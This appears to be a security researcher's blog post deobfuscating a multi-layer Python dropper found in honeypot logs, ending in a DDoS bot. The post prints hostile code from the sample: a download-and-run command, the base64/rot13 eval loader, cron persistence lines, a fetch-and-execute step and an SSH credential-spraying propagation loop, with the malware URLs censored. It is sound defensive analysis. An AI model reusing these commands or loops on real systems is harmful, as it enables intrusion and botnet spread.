Deobfuscating multiple layers of malicious python

1. Background
2. Layer One: command line bash/ssh
3. Layer Two: the downloaded python script
4. Layer Three: the embedded, evaluated python script
5. Layer Four: compiled python
6. Layer Five: the final python bot code
7. Final comments

1. Background

One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in the Tactics, Techniques and Procedures (TTPs) of deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others, here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple, and it makes for an interesting look at how malware uses multiple layers of obfuscated python.

2. Layer One: command line bash/ssh

The honeypot log in question turned up the following commands (formatted for readability), which started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds or thousands of times a day, but this particular command is only caught a few times a day.

cd /tmp
(( apt update -y && apt install python3 wget -y ) || 
 ( yum update -y && yum install epel-release -y && yum install python3 wget -y ))
wget -O updater.zip [MALWAREURLCENSORED]
python3 updater.zip
rm updater.zip && cd ~

This part isn't anything special, of course: it's a simple downloader/dropper that first tries to make sure the tools it needs (python3 and wget) are installed. It does assume it's on a debian or redhat-like system, but otherwise will still work on other systems that have python3 and wget pre-installed (like many, if not most, *nix systems).

Outstanding question 1: Reading scripts like this always leaves me with random questions like: "what's the point of the final cd to $HOME?"

3. Layer Two: the downloaded python script

The python script that was downloaded (updater.zip above) is much more interesting (abbreviated here, with the actual malware strings truncated):

import base64, codecs
magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp'
love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh'
god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh'
destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X'
joy = '\x72\x6f\x74\x31\x33'
trust = \
    eval('\x6d\x61\x67\x69\x63') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \
    eval('\x67\x6f\x64') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

First, to the author: good creative use of variable names.

So what does the above do?

Creates 4 variables (magic … destiny) holding base64-encoded strings.
Creates a 5th variable (joy) containing the string "rot13", written as hexadecimal escapes.
Creates a 6th variable (trust) by concatenating the results of multiple calls to eval(). Each input to eval() is further obfuscated by writing it as hexadecimal escapes to prevent (easy) human readability. The arguments to these eval() calls are really:
1. the string 'magic', which evaluates to the contents of the magic variable
2. codecs.decode(love, joy), which applies the rot13 substitution cipher to the contents of the love variable
3. the string 'god', which evaluates to the contents of the god variable
4. codecs.decode(destiny, joy), which applies rot13 to the contents of the destiny variable
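The hexadecimal escapes can be read without ever calling eval() on them. A minimal sketch, assuming the literals have been copied out of the script as raw text: ast.literal_eval() only parses literals, so it turns each escaped string into its plain form without running any code.

```python
import ast

# String literals copied verbatim from the script, kept as raw text so the
# backslashes are still literal characters at this point.
obfuscated_literals = [
    r"'\x6d\x61\x67\x69\x63'",
    r"'\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29'",
    r"'\x72\x6f\x74\x31\x33'",
]

# literal_eval parses the literal only; it never evaluates expressions.
decoded = [ast.literal_eval(lit) for lit in obfuscated_literals]

for plain in decoded:
    print(plain)
```

The three outputs are the names and the expression described in the list above: magic, codecs.decode(love, joy) and rot13.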

Summarizing for readability, the trust assignment line becomes:

trust = \
    magic + \
    codecs.decode(love, joy) + \
    god + \
    codecs.decode(destiny, joy)

The final contents of the trust variable are a base64 string of 1824 characters. This string is fed to base64.b64decode(), which decodes it to yet another python script; that script is then compiled and executed.
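For analysis we want the decoded text but not the execution. The following is a minimal sketch of that idea, not the tooling I actually used: rebuild_layer() is a hypothetical helper name, and the four fragments here are built from a harmless stand-in string because the real values are truncated above.

```python
import base64
import codecs

def rebuild_layer(magic, love, god, destiny):
    """Reassemble the four fragments and return the decoded source as text.

    Nothing is compiled or executed; the result is only returned for reading.
    """
    trust = (magic
             + codecs.decode(love, "rot13")
             + god
             + codecs.decode(destiny, "rot13"))
    return base64.b64decode(trust).decode("utf-8", errors="replace")

# Harmless stand-in payload, split and obfuscated the same way as the sample.
stand_in = "print('hello from the next layer')\n"
encoded = base64.b64encode(stand_in.encode("utf-8")).decode("ascii")
q = len(encoded) // 4
parts = [encoded[:q], encoded[q:2 * q], encoded[2 * q:3 * q], encoded[3 * q:]]
magic, god = parts[0], parts[2]
love = codecs.encode(parts[1], "rot13")      # fragments 2 and 4 are rot13'd
destiny = codecs.encode(parts[3], "rot13")

recovered = rebuild_layer(magic, love, god, destiny)
print(recovered)
```

Rot13 only touches letters, so the digits, "+", "/" and "=" of the base64 alphabet pass through unchanged and the fragments stay valid base64 characters either way.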

4. Layer Three: the embedded, evaluated python script

The output of the previous step produces a longer string of python code that is passed to compile and eval to run the following code (edited for formatting and malware URL removal). I'll break this longer script into chunks.

First, the top few lines import the needed modules and define the nw variable, setting it to "12", which I'll get back to in a minute.

import sys,os,subprocess,time

nw="12"

After that come a number of functions that are just filler, from what I can tell, as they're never actually used:

def a(b):
    c = b*2
    return c

def oO1oO(OO):
    OOO = 0
    return OO

def oOOOO2(OO):
    OOO = 0
    return OO

def oOo1(OO):
    OOO = 0
    return OO

Next there is one more defined function, which actually is used, and is just a wrapper around os.system() to ensure it continues in case of any exceptions being thrown:

def abc(cl):
    try:
        os.system(cl)
    except:
        pass

Finally comes the meat of the script, which starts by checking if a /opt/lsb/.pki file exists on the system being penetrated and if it contains the string from the nw variable above ("12"). Depending on these results, it sets the ald variable to 1 if the file exists and contains "12", or otherwise sets it to 0.

The importance of the ald variable will become apparent in a minute.

I'll also question the need for the while True component of this script at the end of this post.

while True:
    try:
        ald = 0
        try:
            with open('/opt/lsb/.pki', "r+") as fl:
                if nw in fl.read():
                    ald = 1
                else:
                    ald = 0
        except:
            ald = 0

Next, the script similarly sets a crn variable to 1 if a cronjob has already been configured that executes the final malware binary fuse (as we will see a bit later).

crn = 0
try:
    cron = subprocess.check_output("crontab -l",shell=True).decode('utf-8')
    if "fuse" in cron:
        crn = 1
    else:
        crn = 0
except:
    crn = 0

Now that the script has properly probed the system for components of its previous runs, it can actually do something with the results. First, it checks to see if the ald variable indicates that "12" was in the /opt/lsb/.pki file:

if ald == 1:
    print("[1]-  Stopped         /usr/lib/systemd/systemd-logind")
    sys.exit()

This check functions as a crude version control mechanism: a system already compromised by the current version is left alone, while a system holding an older version gets upgraded. Thus, if the author changed the string in the nw variable to "13" but "12" was stored in /opt/lsb/.pki, the rest of the script would continue running to self-update to the latest and greatest malware.

Outstanding question: what's the purpose of this print message?

Note/Bug: Because of the way string searching is used for "12", it would also match "112" and any other string containing "12"; the version handling isn't as robust as it could be. But I'm certainly being picky here in my code review.
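To make the pickiness concrete, here is a small sketch comparing the substring test with a stricter comparison. The file format ("keys-0" followed by the version) is taken from the echo command later in the script; strict_check() is my own hypothetical alternative, not something found in the malware.

```python
def naive_check(contents, nw="12"):
    # What the script does: a plain substring search.
    return nw in contents

def strict_check(contents, nw="12"):
    # Hypothetical stricter variant: require exactly "keys-0 <version>".
    fields = contents.split()
    return len(fields) == 2 and fields[0] == "keys-0" and fields[1] == nw

current = "keys-0 12\n"     # what the script writes for nw = "12"
other = "keys-0 112\n"      # a different (made-up) version containing "12"

print(naive_check(current), strict_check(current))
print(naive_check(other), strict_check(other))
```

The substring test treats both files as "already at version 12", while the stricter comparison accepts only the first.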

Next up, the script installs fuse with apt or yum, kills any running process named fuse, and removes any existing fuse binary from /usr/sbin:

abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''')
abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')

Afterward, if there is no cron job installed to re-run the fuse binary at reboot, it adds a crontab entry to do so. (Again, the previous check for the string "fuse" in any cronjob will probably produce some false positives.)

if crn == 0:
    abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')
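The false positive mentioned above is easy to reproduce. In this sketch the benign crontab line is a made-up example, and strict_has_entry() is a hypothetical stricter test that looks for /usr/sbin/fuse as a complete path; neither comes from the malware itself.

```python
import re

# Matches /usr/sbin/fuse only as a whole path, not as part of a longer one.
FUSE_PATH = re.compile(r"(?<![\w/.-])/usr/sbin/fuse(?![\w/.-])")

def naive_has_entry(crontab_text):
    # What the script does: a plain substring search for "fuse".
    return "fuse" in crontab_text

def strict_has_entry(crontab_text):
    # Hypothetical stricter variant: look for the exact binary path.
    return any(FUSE_PATH.search(line) for line in crontab_text.splitlines())

benign = "0 3 * * * /usr/bin/fusermount -u /mnt/backup\n"   # made-up example
infected = "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &\n"

print(naive_has_entry(benign), strict_has_entry(benign))
print(naive_has_entry(infected), strict_has_entry(infected))
```

A pure-text function like this may also be handy when checking crontab dumps collected from hosts for this particular entry.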

Next, we get to the creation of the /opt/lsb/.pki version number file:

abc(''' rm -R /opt/lsb/ ''')
abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))

Finally, we get to the actual fuse malware downloading, installing and initial run. Again, we see the script using print to log a fake stopped message for systemd-logind for some reason.

    abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''')
    abc(''' nohup /usr/sbin/fuse>/dev/null & ''')

    print("[1]+  Stopped         /usr/lib/systemd/systemd-logind")
    sys.exit()
except:
    sys.exit()

One final outstanding question: why the while True portion of the script? Every path through the script ends in a call to sys.exit(), which means the body of the while loop should only ever run once anyway.
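One subtlety is worth checking here: sys.exit() works by raising SystemExit, and a bare except: catches that too. The sketch below reproduces only the control-flow skeleton of the script (no malware logic) inside a hypothetical count_iterations() wrapper, to confirm that the loop still runs just once because the handler itself calls sys.exit() again.

```python
import sys

def count_iterations():
    """Run the script's loop skeleton and report how often the body ran."""
    iterations = 0
    try:
        while True:
            iterations += 1
            try:
                sys.exit()      # raises SystemExit inside the try block
            except:             # a bare except also catches SystemExit...
                sys.exit()      # ...but the handler exits again, ending the loop
    except SystemExit:
        # Caught here only so this demonstration can return a value.
        pass
    return iterations

print(count_iterations())
```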

5. Layer Four: compiled python

The final /usr/sbin/fuse binary that is installed is also a python script, but it has been compiled into a Linux ELF binary. We can determine this by examining it using strings and/or objdump -D and noticing a pydata section in the ELF dump output. This pydata section contains a compiled python (pyc) formatted block, with a 16-byte header showing that a recent version of python was used to compile it.
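For reference, a standard CPython .pyc file (python 3.7 and later) starts with a 16-byte header: a 4-byte magic number identifying the interpreter version, a 4-byte flags field, and 8 more bytes that hold either the source mtime and size or a source hash. The sketch below does not touch the malware sample; it compiles a harmless throwaway file and reads its header back, and read_pyc_header() is a hypothetical helper name.

```python
import importlib.util
import os
import py_compile
import struct
import tempfile

def read_pyc_header(path):
    """Return (magic, flags, field1, field2) from the first 16 bytes."""
    with open(path, "rb") as fh:
        header = fh.read(16)
    magic = header[:4]
    flags, field1, field2 = struct.unpack("<III", header[4:16])
    return magic, flags, field1, field2

with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "harmless.py")
    pyc = os.path.join(tmp, "harmless.pyc")
    with open(src, "wb") as fh:
        fh.write(b"x = 1\n")
    # Force the timestamp-based header so the last two fields are mtime/size.
    py_compile.compile(src, cfile=pyc, doraise=True,
                       invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP)
    magic, flags, mtime, source_size = read_pyc_header(pyc)

# The magic number differs between python releases, which is what lets an
# analyst estimate the version used to build a sample.
print(magic == importlib.util.MAGIC_NUMBER, flags, source_size)
```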

We next extract this pydata section in order to extract the compiled python byte code.

objcopy -O binary --only-section=pydata \
   --set-section-flags pydata=alloc fuse fuse-pythoncode.bin

We can use pyinstaller's archive_viewer.py command to list and extract the pieces of the saved pydata section:

cd pyinstaller
PYTHONPATH=. python3 \
./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | 
  head -15

['struct',
 'pyimod01_os_path',
 'pyimod02_archive',
 'pyimod03_importers',
 'pyimod04_ctypes',
 'pyiboot01_bootstrap',
 'pyi_rth_pkgutil',
 'pyi_rth_multiprocessing',
 'pyi_rth_inspect',
 'fuse',
 '_cffi_backend.cpython-39-x86_64-linux-gnu.so',
 'bcrypt/_bcrypt.abi3.so',
 'cryptography/hazmat/bindings/_openssl.abi3.so',
 'cryptography/hazmat/bindings/_padding.abi3.so',
 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',

We note that fuse is also the name of the actual final python block to be executed, so we extract it as well using archive_viewer.py's X command. It appears to be C-compiled cpython code, so decoding it is a bit trickier. However, we're in luck because the developer wasn't as careful as they could have been: if we run strings on the extracted file, we see 4 base64 encoded strings in the output. Like before, 2 of these are rot13 encoded. We can then combine them using the same technique as for the previous four strings above (magic … destiny).
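The same search that strings performs can be narrowed to long base64-looking runs. This is a minimal sketch on a synthetic blob, not on the real sample: the 40-character minimum, the find_base64_runs() name and the filler bytes are all assumptions made for illustration.

```python
import base64
import re

def find_base64_runs(blob, min_len=40):
    """Return long runs of base64-alphabet bytes found in a binary blob."""
    pattern = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    return [m.group(0).decode("ascii") for m in pattern.finditer(blob)]

# Build a synthetic "binary": four base64 fragments separated by filler bytes.
stand_in = b"print('harmless stand-in for the bot script')\n" * 5
encoded = base64.b64encode(stand_in).decode("ascii")
q = len(encoded) // 4
chunks = [encoded[:q], encoded[q:2 * q], encoded[2 * q:3 * q], encoded[3 * q:]]
filler = b"\x00\x01\x02"
blob = filler + filler.join(c.encode("ascii") for c in chunks) + filler

runs = find_base64_runs(blob)
print(len(runs))
```

Rot13 maps letters to letters, so fragments that are additionally rot13 encoded still match the same pattern; telling them apart from the plain ones has to be done afterwards, for example by checking which combination decodes to readable python.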

6. Layer Five: the final python bot code

After extracting and decoding these 4 additional base64 encoded strings, we get an 845-line python bot script with the following functions in it:

grep 'def ' final-packaged-python.py

def encrypt(data,key):
def decrypt(data,key):
def litehash(data):
def getProxy():
def getRandomPayload(size):
def getRandomString(size):
def pack_varint(val):
def pack_str(bb):
def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0):
def getSSL(sock, host):
def loader(addr):
def scan():
def http_get(task_name, url, host, ip, port,ifprox, rcns):
def http_fast(task_name, url, host, ip, port,ifprox, rcns):
def mccrash(task_name,ip,port,hostn,ifprox, rcns):
def mcbot(task_name,ip,port,hostn,ifprox, rcns):
def mcping(task_name,ip,port,ifprox, rcns):
def mcdata(task_name,ip,port,hostn,ifprox, rcns):
def junk(task_name,ip,port,ifprox, rcns):
def handshake(task_name,ip,port,ifprox, rcns):
def tcp(task_name,ip,port,size,ifprox, rcns):
def netty(task_name,ip,port,pkt,ifprox, rcns):
def raknet(task_name,ip,port):
def vse(task_name,ip,port):
def udp(task_name,ip,port,size):
def getHTTP(base):
def download_file(url, file):
def attack(method,ip,port,size,threads,times, ifprox, rcns):
def getIP():
def execer(cmd):
def updateProxy(url):

As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:

payload = "cd /tmp; ...  python3 updater.zip && rm updater.zip && cd ~ "

Along with it, the code to deliver it over SSH:

for i in credentials:
        try:

                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(addr, username=i[0], password=i[1])

                stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1')

                if str(stdout.read()).split('b\'')[1] != '':

                        i, o, e = ssh.exec_command(payload)
                        time.sleep(10)
                        break
                ssh.close()
        except Exception as E:
                #print(E)
                time.sleep(1)
                continue

7. Final comments

All in all, this was an interesting trail to analyze: it demonstrates the greater level of obfuscation that more talented malicious actors will use, beyond what basic script kiddies manage.

Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly raises the author above the low-hanging fruit of average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I submitted the final python payload to VirusTotal as well, but all of the engines report "Undetected" and thus not malicious in nature, which is clearly an error.

The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.

Acknowledgments: thank you to Robert Story for reviewing this!